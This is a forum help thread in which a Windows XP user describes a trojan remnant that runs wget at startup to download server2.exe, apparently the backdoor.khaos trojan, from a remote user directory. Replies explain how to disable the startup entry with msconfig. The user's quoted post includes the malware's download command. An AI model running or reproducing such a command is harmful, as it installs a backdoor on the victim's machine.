Virus?

  • Thread starter Thread starter rebecca
  • Start date Start date
R

rebecca

My computer was infected with quite a few virus but all
have been cleaned but think there is a remant of one left
over. Upon start-up a black command window comes up
looking for wget http://earthlink.com port
80/~mdavido317/cmd.exe/server2.exe then another box
comes up and says it can't find server2.exe. I found
the wget.exe file and deleted it.... now the black box
still comes up but nothing in it and I still get the
can't find server2.exe

Any ideas what is wrong. My computer runs find but I
have to go and close the boxes from the task manager.

Anyone know what server2.exe and if it got deleted by
mistake. I have done some searching and looks like a
backdoor-khaos virus.

Help!!!
 
It looks like one of the Trojans or viruses left a key in
your system registry. The key loads the wget program at
startup and attempts to download the "server2.exe" file
(this is the backdoor.khaos trojan file). You can safely
disable this key by going to Start, Run... and typing
msconfig then clicking OK. Next, go to the Startup tab and
clear the checkbox next to the line that contains "wget".
You might have to fiddle around a bit to find this one. If
you are in doubt, disable all, then re-enable one at a
time (restarting your computer each time) until you find
the right one.

Make sure you keep your antivirus program updated, and
scan your computer once a week. Enabling the Internet
Connection Firewall (or running ZoneAlarm or something
similar) can help keep your computer from being a hacker
target.
 
I am running windows XP....... looks like leftovers from
a trojan and in my registry. Guess the anti-virus didn't
clean that part.
 
See www.dougknox.com, Win XP Utilities, Startup Programs Tracker. This
small utility scans your system for startup programs and running processes.
It also allows you to create a log file that can be copied and pasted into a
newsgroup post. The contents of the program window are also copied to the
Windows Clipboard, automatically.
 
rebecca said:
My computer was infected with quite a few virus but all
have been cleaned but think there is a remant of one left
over. Upon start-up a black command window comes up
looking for wget http://earthlink.com port
80/~mdavido317/cmd.exe/server2.exe then another box
comes up and says it can't find server2.exe. I found
the wget.exe file and deleted it.... now the black box
still comes up but nothing in it and I still get the
can't find server2.exe
Click to expand...

Looks like the clear up left a line in the startup collection. Start -
Run MSConfig, look for a line that has the wget.exe in its Command , and
uncheck it. On OK there is no need to exit, but next time you boot up
there will be a message about 'troubleshooting' - check the 'Don't show
again' box and OK
 

Ask a Question

Want to reply to this thread or ask your own question?

You'll need to choose a username for the site, which only take a couple of moments. After that, you can post your question and our members will help you out.

Ask a Question

Similar Threads

The Aftermath of the Deadly Win32/Sality Virus 1
Advice needed !!! 3
VIRUS -need help 8
What if Virus can't be cleaned and can't be quarantined? 10
registry? virus? help! 3
DR scenario with 2 NICs 2
System32 7
Is anyone experience like this? How did you removed this threat? 3

Back
Top